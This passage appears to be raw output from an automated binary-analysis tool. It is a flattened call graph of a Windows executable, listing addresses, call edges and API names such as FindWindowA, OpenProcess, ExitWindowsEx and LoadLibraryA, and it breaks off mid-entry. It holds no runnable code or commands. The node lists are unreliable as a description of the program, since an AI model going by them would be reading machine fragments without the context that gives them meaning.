std::locale::_Init 90 API calls 66467->66469 66470 11146450 std::locale::_Init 21 API calls 66468->66470 66469->66464 66472 1102e7d8 66470->66472 67530 1102d330 66472->67530 67667 11029450 266 API calls 2 library calls 66473->67667 66476 1110f420 std::locale::_Init 266 API calls 66474->66476 66478 1102e820 66476->66478 66479 1102e840 66478->66479 66480 111100d0 425 API calls 66478->66480 66481 1110f420 std::locale::_Init 266 API calls 66479->66481 66480->66479 66482 1102e854 66481->66482 66483 111100d0 425 API calls 66482->66483 66484 1102e874 66482->66484 66483->66484 66485 1110f420 std::locale::_Init 266 API calls 66484->66485 66486 1102e8f3 66485->66486 66487 1102e923 66486->66487 67668 11060f70 298 API calls std::locale::_Init 66486->67668 66489 1110f420 std::locale::_Init 266 API calls 66487->66489 66490 1102e93d 66489->66490 66491 1102e962 FindWindowA 66490->66491 67669 11060be0 290 API calls std::locale::_Init 66490->67669 66494 1102eab7 66491->66494 66495 1102e99b 66491->66495 66852 110613d0 66494->66852 66495->66494 66498 1102e9b3 GetWindowThreadProcessId 66495->66498 66500 11146450 std::locale::_Init 21 API calls 66498->66500 66499 110613d0 269 API calls 66501 1102ead5 66499->66501 66502 1102e9d9 OpenProcess 66500->66502 66503 110613d0 269 API calls 66501->66503 66502->66494 66505 1102e9f9 66502->66505 66504 1102eae1 66503->66504 66506 1102eaf8 66504->66506 66507 1102eaef 66504->66507 67670 11094b30 105 API calls 66505->67670 66859 11145910 66506->66859 67671 11027d60 119 API calls 2 library calls 66507->67671 66510 1102ea18 66513 11146450 std::locale::_Init 21 API calls 66510->66513 66511 1102eaf4 66511->66506 66515 1102ea2c 66513->66515 66514 1102eb07 66874 11144dc0 ExpandEnvironmentStringsA 66514->66874 66516 1102ea6b CloseHandle FindWindowA 66515->66516 66517 11146450 std::locale::_Init 21 API calls 66515->66517 66518 1102ea93 GetWindowThreadProcessId 66516->66518 66519 1102eaa7 66516->66519 66521 1102ea3e SendMessageA WaitForSingleObject 66517->66521 66518->66519 66522 11146450 std::locale::_Init 21 API calls 66519->66522 66521->66516 66524 1102ea5e 66521->66524 66525 1102eab4 66522->66525 66527 11146450 std::locale::_Init 21 API calls 66524->66527 66525->66494 66529 1102ea68 66527->66529 66528 1102eb2a 66530 1102ec01 66528->66530 66898 11062d60 66528->66898 66529->66516 66913 110274c0 66530->66913 67731 11142ac0 66846->67731 66848 11165797 85 API calls std::locale::_Init 66850 11142bc5 66848->66850 66849 11142ac0 IsDBCSLeadByte 66849->66850 66850->66848 66850->66849 66851 1102e6d4 66850->66851 66851->66457 67520 11081bb0 66851->67520 66853 11061446 66852->66853 66854 110613f7 66852->66854 66855 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66853->66855 66854->66853 66858 11081bb0 86 API calls 66854->66858 67743 110612f0 269 API calls 4 library calls 66854->67743 66857 1102eac9 66855->66857 66857->66499 66858->66854 67744 11144bd0 66859->67744 66862 11144bd0 std::locale::_Init 266 API calls 66863 11145947 wsprintfA 66862->66863 66864 11143230 std::locale::_Init 8 API calls 66863->66864 66866 11145964 66864->66866 66865 11145990 66868 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66865->66868 66866->66865 66867 11143230 std::locale::_Init 8 API calls 66866->66867 66869 11145979 66867->66869 66870 1114599c 66868->66870 66869->66865 66871 11145980 66869->66871 66870->66514 66872 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66871->66872 66873 1114598c 66872->66873 66873->66514 66875 11144df7 66874->66875 66876 11144e14 std::locale::_Init 66875->66876 66877 11144e2e 66875->66877 66885 11144e04 66875->66885 66880 11144e25 GetModuleFileNameA 66876->66880 66878 11144bd0 std::locale::_Init 266 API calls 66877->66878 66881 11144e34 66878->66881 66879 11142290 std::locale::_Init 266 API calls 66882 11144e88 66879->66882 66880->66881 66883 11081b40 std::locale::_Init IsDBCSLeadByte 66881->66883 66884 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66882->66884 66883->66885 66886 1102eb18 66884->66886 66885->66879 66887 11143230 66886->66887 66888 11143251 CreateFileA 66887->66888 66890 111432ee CloseHandle 66888->66890 66891 111432ce 66888->66891 66894 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66890->66894 66892 111432d2 CreateFileA 66891->66892 66893 1114330b 66891->66893 66892->66890 66892->66893 66896 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 66893->66896 66895 11143307 66894->66895 66895->66528 66897 1114331a 66896->66897 66897->66528 66899 1105dd10 79 API calls 66898->66899 66900 11062d88 66899->66900 67793 11061c90 66900->67793 68519 11060f40 66913->68519 67513 11142aa8 67512->67513 67516 11142a6e 67512->67516 67514 11142290 std::locale::_Init 266 API calls 67513->67514 67515 11142ab0 67514->67515 67515->66454 67516->67513 67517 11142a92 67516->67517 69600 11142310 268 API calls std::locale::_Init 67517->69600 67519 11142a98 67519->66454 67521 11081bbd 67520->67521 67522 11081bc2 67520->67522 69601 11081990 IsDBCSLeadByte 67521->69601 67524 11081bcb 67522->67524 67529 11081bdf 67522->67529 69602 111646ce 85 API calls 2 library calls 67524->69602 67526 11081bd8 67526->66459 67527 11081c43 67527->66459 67528 11165797 85 API calls std::locale::_Init 67528->67529 67529->67527 67529->67528 67531 11146450 std::locale::_Init 21 API calls 67530->67531 67532 1102d36c 67531->67532 67533 11145320 std::locale::_Init 90 API calls 67532->67533 67534 1102d374 67533->67534 67535 1102d3a9 GetCurrentProcess SetPriorityClass 67534->67535 67536 1102d37d InterlockedIncrement 67534->67536 67539 1102d3dd 67535->67539 67536->67535 67537 1102d38c 67536->67537 67538 11146450 std::locale::_Init 21 API calls 67537->67538 67541 1102d396 67538->67541 67540 1102d3e6 SetEvent 67539->67540 67544 1102d3ed 67539->67544 67540->67544 67543 1102d3a0 Sleep 67541->67543 67542 1102d424 67548 1102d452 67542->67548 69622 1109f1d0 274 API calls std::locale::_Init 67542->69622 67543->67543 67544->67542 69620 11029370 278 API calls 2 library calls 67544->69620 67547 1102d40d 69621 110ff6c0 277 API calls 2 library calls 67547->69621 69603 11028090 SetEvent 67548->69603 67551 1102d468 67552 1102d47d 67551->67552 69623 110ec980 457 API calls 67551->69623 67554 1102d49f 67552->67554 69624 110594a0 SetEvent 67552->69624 67556 1102d4de 67554->67556 67557 1102d4b3 Sleep 67554->67557 67558 11146450 std::locale::_Init 21 API calls 67556->67558 67557->67556 67559 1102d4e8 67558->67559 67560 1102d518 67559->67560 67562 1105dd10 79 API calls 67559->67562 67563 1102d58a 67560->67563 67564 1102d53f 67560->67564 67562->67560 69627 11026f20 6 API calls std::ios_base::_Tidy 67563->69627 69604 110affa0 67564->69604 67567 1102d590 67571 1102d5af PostThreadMessageA 67567->67571 67576 1102d5cb 67567->67576 69628 1110f3a0 WaitForSingleObject 67571->69628 67572 1102d5f7 std::ios_base::_Tidy 67581 11146450 std::locale::_Init 21 API calls 67572->67581 67596 1102d62d 67572->67596 67573 1102d5f0 69630 11059400 DeleteCriticalSection CloseHandle 67573->69630 67576->67572 67576->67573 69629 1110f3a0 WaitForSingleObject 67576->69629 67577 1102d56a 67583 1102d57d 67577->67583 69626 111352b0 300 API calls 5 library calls 67577->69626 67578 1102d66b 67580 1102d681 67578->67580 67586 11075d10 403 API calls 67578->67586 67587 11146450 std::locale::_Init 21 API calls 67580->67587 67581->67596 69650 1100d4e0 FreeLibrary 67583->69650 67586->67580 67591 1102d68b 67587->67591 67589 1102d661 69632 11107b50 653 API calls std::locale::_Init 67589->69632 67595 1113cc30 302 API calls 67591->67595 67592 1102d666 69633 11105ac0 348 API calls std::locale::_Init 67592->69633 67593 1102d8a0 67603 1102d8c7 GetModuleFileNameA GetFileAttributesA 67593->67603 67616 1102d9fa 67593->67616 67594 1102d889 67594->67593 69651 1100d200 wsprintfA 67594->69651 67599 1102d690 67595->67599 67596->67578 69631 11105420 26 API calls std::locale::_Init 67596->69631 67601 11146450 std::locale::_Init 21 API calls 67599->67601 67600 1102d895 67602 11146450 std::locale::_Init 21 API calls 67600->67602 67604 1102d69a 67601->67604 67602->67593 67606 1102d8ef 67603->67606 67603->67616 67614 1102d6ae std::ios_base::_Tidy 67604->67614 69634 1109d920 WaitForSingleObject SetEvent WaitForSingleObject CloseHandle 67604->69634 67605 11146450 std::locale::_Init 21 API calls 67607 1102da92 67605->67607 67609 1110f420 std::locale::_Init 266 API calls 67606->67609 69654 11146410 FreeLibrary 67607->69654 67608 11146450 std::locale::_Init 21 API calls 67612 1102d6c1 67608->67612 67613 1102d8f6 67609->67613 67622 1102d6d5 std::ios_base::_Tidy 67612->67622 69635 1110e5c0 DeleteCriticalSection std::ios_base::_Tidy 67612->69635 67619 11142a60 268 API calls 67613->67619 67626 1102d918 67613->67626 67614->67608 67615 1102da9a 67617 1102dad6 67615->67617 67620 1102dac4 ExitWindowsEx 67615->67620 67621 1102dab4 ExitWindowsEx Sleep 67615->67621 67616->67605 67623 1102dae6 67617->67623 67624 1102dadb Sleep 67617->67624 67619->67626 67620->67617 67621->67620 67625 1102d74f 67622->67625 69636 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 67622->69636 67628 11146450 std::locale::_Init 21 API calls 67623->67628 67624->67623 67634 1102d760 std::ios_base::_Tidy 67625->67634 69638 1110fc70 279 API calls 2 library calls 67625->69638 67631 11142bb0 86 API calls 67626->67631 67633 1102daf0 ExitProcess 67628->67633 67636 1102d93d 67631->67636 67658 1102d7d9 std::ios_base::_Tidy 67634->67658 69639 1110fc70 279 API calls 2 library calls 67634->69639 67635 11146450 std::locale::_Init 21 API calls 67637 1102d7ec 67635->67637 67638 1102d9e3 67636->67638 67640 11081b40 std::locale::_Init IsDBCSLeadByte 67636->67640 67639 1102d809 CloseHandle 67637->67639 69640 1108a570 67637->69640 67638->67616 67644 1102d824 67639->67644 67645 1102d82a 67639->67645 67643 1102d953 67640->67643 67641 11146450 std::locale::_Init 21 API calls 67657 1102d6ff std::ios_base::_Tidy 67641->67657 67647 1102d96e _memset 67643->67647 69652 11029450 266 API calls 2 library calls 67643->69652 67648 11162be5 _free 66 API calls 67644->67648 67666 1102d869 std::ios_base::_Tidy 67645->67666 69647 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 67645->69647 67646 1102d800 std::ios_base::_Tidy 67646->67639 67651 1102d988 FindFirstFileA 67647->67651 67648->67645 67654 1102d9d4 67651->67654 67655 1102d9a8 FindNextFileA 67651->67655 67652 1102d858 67652->67666 69649 1110fc70 279 API calls 2 library calls 67652->69649 69653 111266e0 292 API calls 5 library calls 67654->69653 67664 1102d9c8 FindClose 67655->67664 67656 11162be5 _free 66 API calls 67660 1102d83c 67656->67660 67657->67625 67657->67641 69637 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 67657->69637 67658->67635 67660->67652 67660->67656 69648 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 67660->69648 67664->67654 67666->67583 67668->66487 67669->66491 67670->66510 67671->66511 67732 11142ad6 67731->67732 67733 11142b93 67732->67733 67738 11081a70 67732->67738 67733->66850 67735 11142afb 67736 11081a70 IsDBCSLeadByte 67735->67736 67737 11142b2b _memmove 67736->67737 67737->66850 67739 11081a7c 67738->67739 67741 11081a81 __mbschr_l std::locale::_Init 67738->67741 67742 11081990 IsDBCSLeadByte 67739->67742 67741->67735 67742->67741 67743->66854 67745 11144bf2 67744->67745 67749 11144c09 std::locale::_Init 67744->67749 67790 11029450 266 API calls 2 library calls 67745->67790 67748 11144d97 67750 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 67748->67750 67749->67748 67751 11144c3c GetModuleFileNameA 67749->67751 67752 11144db3 wsprintfA 67750->67752 67768 11081b40 67751->67768 67752->66862 67754 11144c51 67755 11144c61 SHGetFolderPathA 67754->67755 67756 11144d48 67754->67756 67757 11144c8e 67755->67757 67758 11144cad SHGetFolderPathA 67755->67758 67759 11142290 std::locale::_Init 263 API calls 67756->67759 67757->67758 67761 11144c94 67757->67761 67762 11144ce2 67758->67762 67759->67748 67791 11029450 266 API calls 2 library calls 67761->67791 67764 1102a620 std::locale::_Init 145 API calls 67762->67764 67766 11144cf3 67764->67766 67772 11144670 67766->67772 67769 11081b53 _strrchr 67768->67769 67771 11081b6a std::locale::_Init 67769->67771 67792 11081990 IsDBCSLeadByte 67769->67792 67771->67754 67773 111446fa 67772->67773 67774 1114467b 67772->67774 67773->67756 67774->67773 67775 1114468b GetFileAttributesA 67774->67775 67776 111446a5 67775->67776 67777 11144697 67775->67777 67778 11163cf8 __strdup 66 API calls 67776->67778 67777->67756 67779 111446ac 67778->67779 67780 11081b40 std::locale::_Init IsDBCSLeadByte 67779->67780 67781 111446b6 67780->67781 67782 11144670 std::locale::_Init 67 API calls 67781->67782 67788 111446d3 67781->67788 67783 111446c6 67782->67783 67784 111446dc 67783->67784 67785 111446ce 67783->67785 67787 11162be5 _free 66 API calls 67784->67787 67786 11162be5 _free 66 API calls 67785->67786 67786->67788 67789 111446e1 CreateDirectoryA 67787->67789 67788->67756 67789->67788 67792->67771 67913 11144ea0 67793->67913 67795 11061d1c 67796 110d1550 269 API calls 67795->67796 67797 11061d30 67796->67797 67798 11061f17 67797->67798 67799 11061d44 std::ios_base::_Tidy 67797->67799 67922 1116449d 67797->67922 67803 1116449d _fgets 81 API calls 67798->67803 67800 11062c88 67799->67800 67802 11163db7 std::locale::_Init 102 API calls 67799->67802 67804 110d07c0 266 API calls 67800->67804 67802->67800 67806 11061f31 67803->67806 67841 11061e11 std::ios_base::_Tidy 67804->67841 67805 11061dc7 67807 11061dce 67805->67807 67821 11061e1d _strpbrk std::locale::_Init 67805->67821 67809 11061f97 _strpbrk 67806->67809 67810 11061f38 67806->67810 67941 11163676 67809->67941 67811 11061f7d 67810->67811 67816 11163db7 std::locale::_Init 102 API calls 67810->67816 67817 110d07c0 266 API calls 67811->67817 67815 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 67819 11062cbf 67815->67819 67816->67811 67817->67841 67841->67815 67916 11144eb3 std::ios_base::_Tidy 67913->67916 67914 11144dc0 268 API calls 67914->67916 67916->67914 67917 11144f1a std::ios_base::_Tidy 67916->67917 67918 11144ed5 GetLastError 67916->67918 68012 11163fed 67916->68012 67917->67795 67918->67916 67919 11144ee0 Sleep 67918->67919 67920 11163fed std::locale::_Init 142 API calls 67919->67920 67921 11144ef2 67920->67921 67921->67916 67921->67917 67924 111644a9 _raise 67922->67924 67923 111644bc 68376 111692ef 66 API calls __getptd_noexit 67923->68376 67924->67923 67925 111644ed 67924->67925 67927 111644f2 __lock_file 67925->67927 67933 111644cc _raise 67925->67933 67929 11164506 67927->67929 67940 11164571 67927->67940 67928 111644c1 68377 1116df04 11 API calls _raise 67928->68377 68378 11169287 67929->68378 67933->67805 67935 1116459e 67940->67935 68356 11171a25 67940->68356 67942 1116368f 67941->67942 68015 11163f31 68012->68015 68014 11163fff 68014->67916 68017 11163f3d _raise 68015->68017 68016 11163f50 68072 111692ef 66 API calls __getptd_noexit 68016->68072 68017->68016 68019 11163f7d 68017->68019 68034 111716f8 68019->68034 68020 11163f55 68073 1116df04 11 API calls _raise 68020->68073 68030 11163f60 _raise @_EH4_CallFilterFunc@8 68030->68014 68035 11171704 _raise 68034->68035 68036 1117373c __lock 66 API calls 68035->68036 68048 11171712 68036->68048 68037 11171787 68077 11171822 68037->68077 68038 1117178e 68040 11169d79 __malloc_crt 66 API calls 68038->68040 68046 1117367a __mtinitlocknum 66 API calls 68046->68048 68048->68037 68048->68038 68048->68046 68080 1116b048 LeaveCriticalSection LeaveCriticalSection _doexit 68048->68080 68072->68020 68073->68030 68080->68048 68357 11171a32 68356->68357 68360 11171a47 68356->68360 68376->67928 68377->67933 68523 11060e40 68519->68523 68534 11060760 68523->68534 68527 11060e9c 68535 1110f420 std::locale::_Init 266 API calls 68534->68535 68536 1106077c 68535->68536 68537 110607c5 68536->68537 68538 11060783 68536->68538 68591 1116219a 66 API calls std::exception::_Copy_str 68537->68591 68584 1105e300 68538->68584 68541 110607bb 68545 110607f0 68541->68545 68542 110607d4 68592 111625f1 RaiseException 68542->68592 68544 110607e9 68546 11060b05 68545->68546 68549 11060825 68545->68549 68546->68527 68550 11060984 68549->68550 68551 110608d1 RegEnumValueA 68549->68551 68552 11060859 RegQueryInfoKeyA 68549->68552 68565 11060905 68551->68565 68585 1105e311 LeaveCriticalSection 68584->68585 68586 1105e31b 68584->68586 68585->68586 68587 1105e32f 68586->68587 68588 11162be5 _free 66 API calls 68586->68588 68589 1105e375 68587->68589 68590 1105e339 EnterCriticalSection 68587->68590 68588->68587 68589->68541 68590->68541 68591->68542 68592->68544 69600->67519 69601->67522 69602->67526 69603->67551 69655 110805f0 69604->69655 69609 1102d54a 69613 110eb080 69609->69613 69610 110affe7 69667 11029450 266 API calls 2 library calls 69610->69667 69614 110affa0 268 API calls 69613->69614 69615 110eb0ad 69614->69615 69683 110ea450 69615->69683 69617 110eb0f1 69693 110b0190 268 API calls std::locale::_Init 69617->69693 69619 1102d555 69625 110b0190 268 API calls std::locale::_Init 69619->69625 69620->67547 69621->67542 69622->67548 69623->67552 69624->67554 69625->67577 69626->67583 69627->67567 69628->67567 69629->67576 69631->67589 69632->67592 69633->67578 69635->67622 69636->67657 69637->67657 69638->67634 69639->67658 69641 1108a5aa std::ios_base::_Tidy 69640->69641 69642 1108a617 69640->69642 69641->69642 69644 1108a5be CloseHandle 69641->69644 69643 1108a61e DeleteCriticalSection 69642->69643 69696 1106e1b0 69643->69696 69644->69641 69646 1108a644 std::ios_base::_Tidy 69646->67646 69647->67660 69648->67660 69649->67666 69650->67594 69651->67600 69653->67638 69654->67615 69656 11080614 69655->69656 69657 11080618 69656->69657 69658 1108062f 69656->69658 69668 11029450 266 API calls 2 library calls 69657->69668 69660 11080648 69658->69660 69661 1108062c 69658->69661 69664 110aff90 69660->69664 69661->69658 69669 11029450 266 API calls 2 library calls 69661->69669 69670 110812d0 69664->69670 69671 110812f1 69670->69671 69672 1108131d 69670->69672 69671->69672 69673 1108130b 69671->69673 69675 1108136a wsprintfA 69672->69675 69676 11081345 wsprintfA 69672->69676 69674 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 69673->69674 69677 11081319 69674->69677 69682 11029450 266 API calls 2 library calls 69675->69682 69676->69672 69677->69609 69677->69610 69685 110ea45b 69683->69685 69684 110ea4f5 69684->69617 69685->69684 69686 110ea47e 69685->69686 69687 110ea495 69685->69687 69694 11029450 266 API calls 2 library calls 69686->69694 69689 110ea492 69687->69689 69690 110ea4c2 SendMessageTimeoutA 69687->69690 69689->69687 69695 11029450 266 API calls 2 library calls 69689->69695 69690->69684 69693->69619 69699 1106e1c4 69696->69699 69697 1106e1c8 69697->69646 69699->69697 69700 1106d9a0 67 API calls 2 library calls 69699->69700 69700->69699 69715 11022aa0 69716 11022aba 69715->69716 69717 11022bad 69715->69717 69720 11022ac0 69716->69720 69721 11022b97 69716->69721 69718 11022c07 69717->69718 69719 11022bb5 69717->69719 69726 11022b31 69718->69726 69754 11022a70 414 API calls _free 69718->69754 69723 11022bb7 69719->69723 69724 11022bfc 69719->69724 69725 11022b83 69720->69725 69720->69726 69727 11022ada 69720->69727 69728 11022afa 69720->69728 69752 1101e8f0 291 API calls 69721->69752 69723->69726 69733 11022bd5 69723->69733 69741 11089a40 69723->69741 69753 1101e5b0 309 API calls 2 library calls 69724->69753 69751 1101e8c0 371 API calls 69725->69751 69739 11022b4b 69726->69739 69755 110cb890 7 API calls 69726->69755 69727->69726 69735 11022aeb SetFocus 69727->69735 69728->69726 69750 1101f9e0 333 API calls 2 library calls 69728->69750 69731 11022ba4 69735->69726 69736 11022c05 69736->69726 69737 11022c32 69742 1110f6c0 ___DllMainCRTStartup 4 API calls 69741->69742 69743 11089a53 69742->69743 69744 11089a5d 69743->69744 69759 11089150 269 API calls std::locale::_Init 69743->69759 69747 11089a84 69744->69747 69760 11089150 269 API calls std::locale::_Init 69744->69760 69749 11089a93 69747->69749 69756 11089a10 69747->69756 69749->69726 69750->69726 69751->69726 69752->69731 69753->69736 69754->69726 69755->69737 69761 110896a0 69756->69761 69759->69744 69760->69747 69802 11088970 6 API calls ___DllMainCRTStartup 69761->69802 69763 110896d9 GetParent 69764 110896ec 69763->69764 69765 110896fd 69763->69765 69766 110896f0 GetParent 69764->69766 69767 11144dc0 268 API calls 69765->69767 69766->69765 69766->69766 69768 11089709 69767->69768 69769 11163fed std::locale::_Init 142 API calls 69768->69769 69770 11089716 std::ios_base::_Tidy 69769->69770 69771 11144dc0 268 API calls 69770->69771 69772 1108972f 69771->69772 69803 11013830 22 API calls 2 library calls 69772->69803 69774 1108974a 69774->69774 69775 11143230 std::locale::_Init 8 API calls 69774->69775 69778 1108978a std::ios_base::_Tidy 69775->69778 69776 110897a5 69777 11163db7 std::locale::_Init 102 API calls 69776->69777 69781 110897c3 69776->69781 69777->69781 69778->69776 69779 11142290 std::locale::_Init 266 API calls 69778->69779 69779->69776 69780 11089874 std::ios_base::_Tidy 69782 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 69780->69782 69781->69780 69783 1102a620 std::locale::_Init 145 API calls 69781->69783 69784 11089962 69782->69784 69785 11089813 69783->69785 69784->69749 69786 11142290 std::locale::_Init 266 API calls 69785->69786 69787 1108981b 69786->69787 69788 11081b40 std::locale::_Init IsDBCSLeadByte 69787->69788 69789 11089832 69788->69789 69789->69780 69790 11081bb0 86 API calls 69789->69790 69791 1108984a 69790->69791 69792 1108988e 69791->69792 69793 11089851 69791->69793 69795 11081bb0 86 API calls 69792->69795 69804 110b75d0 69793->69804 69797 11089899 69795->69797 69797->69780 69798 110b75d0 68 API calls 69797->69798 69800 110898a6 69798->69800 69799 110b75d0 68 API calls 69799->69780 69800->69780 69801 110b75d0 68 API calls 69800->69801 69801->69780 69802->69763 69803->69774 69807 110b75b0 69804->69807 69810 111672e3 69807->69810 69813 11167264 69810->69813 69814 11167271 69813->69814 69815 1116728b 69813->69815 69831 11169302 66 API calls __getptd_noexit 69814->69831 69815->69814 69816 11167294 GetFileAttributesA 69815->69816 69818 111672a2 GetLastError 69816->69818 69819 111672b8 69816->69819 69834 11169315 66 API calls 2 library calls 69818->69834 69828 11089857 69819->69828 69836 11169302 66 API calls __getptd_noexit 69819->69836 69820 11167276 69832 111692ef 66 API calls __getptd_noexit 69820->69832 69823 1116727d 69833 1116df04 11 API calls _raise 69823->69833 69824 111672ae 69835 111692ef 66 API calls __getptd_noexit 69824->69835 69828->69780 69828->69799 69829 111672cb 69837 111692ef 66 API calls __getptd_noexit 69829->69837 69831->69820 69832->69823 69833->69828 69834->69824 69835->69828 69836->69829 69837->69824 69838 11134d10 69839 11134d19 69838->69839 69845 11134d48 69838->69845 69840 11145320 std::locale::_Init 90 API calls 69839->69840 69841 11134d1e 69840->69841 69842 11132bf0 275 API calls 69841->69842 69841->69845 69843 11134d27 69842->69843 69844 1105dd10 79 API calls 69843->69844 69843->69845 69844->69845 69846 110310c0 69847 110310ce 69846->69847 69848 11145e80 269 API calls 69847->69848 69849 110310df SetUnhandledExceptionFilter 69848->69849 69850 110310ef std::locale::_Init 69849->69850 69851 11040860 69852 11040892 69851->69852 69853 11040898 69852->69853 69861 110408b4 69852->69861 69854 110facc0 15 API calls 69853->69854 69856 110408aa CloseHandle 69854->69856 69855 110409c8 69857 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 69855->69857 69856->69861 69860 110409d5 69857->69860 69858 110408ed 69858->69855 69859 11040948 69858->69859 69873 110facc0 GetTokenInformation 69859->69873 69861->69855 69861->69858 69883 11087ee0 298 API calls 5 library calls 69861->69883 69864 1104095a 69865 11040962 CloseHandle 69864->69865 69869 11040969 69864->69869 69865->69869 69866 110409ab 69867 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 69866->69867 69871 110409c4 69867->69871 69868 11040991 69870 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 69868->69870 69869->69866 69869->69868 69872 110409a7 69870->69872 69874 110fad08 69873->69874 69875 110facf7 69873->69875 69884 110f1f50 9 API calls 69874->69884 69876 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 69875->69876 69878 110fad04 69876->69878 69878->69864 69879 110fad2c 69879->69875 69880 110fad34 69879->69880 69881 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 69880->69881 69882 110fad5a 69881->69882 69882->69864 69883->69858 69884->69879 69885 110173f0 GetTickCount 69892 11017300 69885->69892 69890 11146450 std::locale::_Init 21 API calls 69891 11017437 69890->69891 69893 11017320 69892->69893 69900 110173d6 69892->69900 69895 11017342 CoInitialize _GetRawWMIStringW 69893->69895 69897 11017339 WaitForSingleObject 69893->69897 69894 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 69896 110173e5 69894->69896 69898 110173c2 69895->69898 69901 11017375 69895->69901 69905 11017220 69896->69905 69897->69895 69899 110173d0 CoUninitialize 69898->69899 69898->69900 69899->69900 69900->69894 69901->69898 69902 110173bc 69901->69902 69904 11163a2d __input_l 79 API calls 69901->69904 69918 11163837 __fassign 69902->69918 69904->69901 69906 11017240 69905->69906 69907 110172e6 69905->69907 69908 11017258 CoInitialize _GetRawWMIStringW 69906->69908 69911 1101724f WaitForSingleObject 69906->69911 69909 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 69907->69909 69912 1101728b 69908->69912 69914 110172d2 69908->69914 69910 110172f5 SetEvent GetTickCount 69909->69910 69910->69890 69911->69908 69912->69914 69915 110172cc 69912->69915 69917 11163a2d __input_l 79 API calls 69912->69917 69913 110172e0 CoUninitialize 69913->69907 69914->69907 69914->69913 69919 11163837 __fassign 69915->69919 69917->69912 69918->69898 69919->69914 69920 11025cd0 LoadLibraryA 69921 1113cd60 69922 1113cd69 69921->69922 69923 1113cd6e 69921->69923 69925 11139090 69922->69925 69926 111390d2 69925->69926 69927 111390c7 GetCurrentThreadId 69925->69927 69928 111390e0 69926->69928 70198 11029330 270 API calls 69926->70198 69927->69926 70052 11133920 69928->70052 69934 111391d1 69940 11139202 FindWindowA 69934->69940 69945 1113929a 69934->69945 69935 1113974a 69936 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 69935->69936 69938 11139772 69936->69938 69938->69923 69939 1113911c IsWindow IsWindowVisible 69941 11146450 std::locale::_Init 21 API calls 69939->69941 69942 11139217 IsWindowVisible 69940->69942 69940->69945 69943 11139147 69941->69943 69944 1113921e 69942->69944 69942->69945 69946 1105dd10 79 API calls 69943->69946 69944->69945 69951 11138c30 393 API calls 69944->69951 69947 1105dd10 79 API calls 69945->69947 69953 111392bf 69945->69953 69949 11139163 IsWindowVisible 69946->69949 69964 111392e7 69947->69964 69948 1105dd10 79 API calls 69959 1113945f 69948->69959 69949->69934 69954 11139171 69949->69954 69950 1113948a 69952 111394a7 69950->69952 70281 1106b860 299 API calls 69950->70281 69956 1113923f IsWindowVisible 69951->69956 69966 111394b4 69952->69966 69967 111394bd 69952->69967 69953->69948 69953->69959 69954->69934 69960 11139179 69954->69960 69955 11138c30 393 API calls 69955->69950 69956->69945 69957 1113924e IsIconic 69956->69957 69957->69945 69961 1113925f GetForegroundWindow 69957->69961 69959->69950 69959->69955 69962 11146450 std::locale::_Init 21 API calls 69960->69962 70279 11131210 147 API calls 69961->70279 69968 11139183 GetForegroundWindow 69962->69968 69964->69953 69965 11139334 69964->69965 69970 11081a70 IsDBCSLeadByte 69964->69970 69972 11143230 std::locale::_Init 8 API calls 69965->69972 70282 11131b00 89 API calls 3 library calls 69966->70282 69973 111394d4 69967->69973 69974 111394c8 69967->69974 69975 11139192 EnableWindow 69968->69975 69976 111391be 69968->69976 69969 1113926e 70280 11131210 147 API calls 69969->70280 69970->69965 69979 11139346 69972->69979 70284 111317a0 300 API calls std::locale::_Init 69973->70284 69980 111394d9 69974->69980 69981 111394cd 69974->69981 70277 11131210 147 API calls 69975->70277 69976->69934 69987 111391ca SetForegroundWindow 69976->69987 69978 111394ba 69978->69967 69988 11139353 GetLastError 69979->69988 70001 11139361 69979->70001 69984 11139599 69980->69984 69990 111394f1 69980->69990 69991 1113959b 69980->69991 70283 11131870 300 API calls std::locale::_Init 69981->70283 69993 111386b0 296 API calls 69984->69993 69985 111391a9 70278 11131210 147 API 